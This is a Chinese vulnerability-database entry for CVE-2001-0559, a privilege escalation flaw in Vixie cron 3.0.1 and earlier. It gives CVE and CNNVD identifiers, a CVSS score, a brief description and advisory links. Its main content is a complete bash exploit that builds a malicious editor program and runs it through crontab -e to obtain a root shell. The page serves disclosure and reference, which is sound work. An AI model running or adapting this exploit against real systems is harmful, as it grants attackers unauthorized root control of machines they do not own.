Vixie cron特权提升漏洞

Vixie cron特权提升漏洞

漏洞ID 1106339 漏洞类型 未知
发布时间 2001-05-07 更新时间 2005-05-02
图片[1]-Vixie cron特权提升漏洞-安全小百科CVE编号 CVE-2001-0559
图片[2]-Vixie cron特权提升漏洞-安全小百科CNNVD-ID CNNVD-200108-066
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20822
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-066
|漏洞详情
Vixiecron3.0.1版本及之前版本的定时任务在修正操作的失败剖析后不能正确地减低特权,本地攻击者可以在编辑器被调用去修正改错误时提升额外特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2687/info

Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.

When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.

This vulnerability may be exploited to gain root privileges locally. 

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <[email protected]>                   |"
echo "| Michal Zalewski <[email protected]>                     |"
echo "`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blahn");
    fclose(x);
  } else {
    dup2(1,0);
    dup2(1,2);
    printf("n>>> Entering rootshell, babe...n");
    system("touch $HOME/.xploited");
    system("bash");
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi
|参考资料

来源:BID
名称:2687
链接:http://www.securityfocus.com/bid/2687
来源:BUGTRAQ
名称:20010507Vixiecronvulnerability
链接:http://www.securityfocus.com/archive/1/183029
来源:MANDRAKE
名称:MDKSA-2001:050
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-050.php3
来源:DEBIAN
名称:DSA-054
链接:http://www.debian.org/security/2001/dsa-054
来源:XF
名称:vixie-cron-gain-privileges(6508)
链接:http://xforce.iss.net/static/6508.php
来源:SUSE
名称:SuSE-SA:2001:17
链接:http://www.novell.com/linux/security/advisories/2001_017_cron_txt.html

相关推荐: NetTelephone账户使用权获得漏洞

NetTelephone账户使用权获得漏洞 漏洞ID 1202149 漏洞类型 未知 发布时间 2003-12-31 更新时间 2003-12-31 CVE编号 CVE-2003-1276 CNNVD-ID CNNVD-200312-345 漏洞平台 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享